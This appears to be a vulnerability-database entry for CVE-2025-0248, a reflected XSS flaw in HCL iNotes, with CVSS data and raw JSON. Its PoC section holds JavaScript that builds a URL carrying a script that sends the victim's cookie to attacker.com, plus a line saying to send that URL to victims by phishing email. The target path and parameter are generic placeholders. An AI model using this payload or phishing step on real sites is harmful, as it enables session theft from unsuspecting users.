Security Vulnerability Report
CVE-2025-0248 CVSS 8.1 HIGH

CVE-2025-0248

Published: 2025-11-25 16:16:06
Last Modified: 2026-04-15 00:35:42

Description

HCL iNotes is susceptible to a Reflected Cross-site Scripting (XSS) vulnerability caused by improper validation of user-supplied input. A remote, unauthenticated attacker can specially craft a URL to execute script in a victim's Web browser within the security context of the hosting Web site and/or steal the victim's cookie-based authentication credentials.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

HCL iNotes versions prior to latest update

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-0248 PoC - Reflected XSS in HCL iNotes
// Target: HCL iNotes
// Attack Vector: Malicious URL with XSS payload in parameter
const https = require('https');

// XSS payload - steals session cookie
const xssPayload = '<script>fetch("https://attacker.com/log?cookie="+document.cookie)</script>';

// Encode the payload for URL
const encodedPayload = encodeURIComponent(xssPayload);

// Target URL - replace with actual vulnerable endpoint
const targetHost = 'vulnerable-server.example.com';
const targetPath = '/iNotes/PrtFwd.nsf'; // Example vulnerable path

// Construct malicious URL
const maliciousUrl = `https://${targetHost}${targetPath}?param=${encodedPayload}`;

console.log('[+] CVE-2025-0248 Reflected XSS PoC');
console.log('[+] Target:', targetHost);
console.log('[+] Malicious URL:');
console.log(maliciousUrl);
console.log('\n[+] Send this URL to victim via phishing email');
console.log('[+] When victim clicks, their cookies will be exfiltrated');

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127032

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0248", "sourceIdentifier": "[email protected]", "published": "2025-11-25T16:16:06.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL iNotes is susceptible to a Reflected Cross-site Scripting (XSS) vulnerability caused by improper validation of user-supplied input. A remote, unauthenticated attacker can specially craft a URL to execute script in a victim's Web browser within the security context of the hosting Web site and/or steal the victim's cookie-based authentication credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127032", "source": "[email protected]"}]}}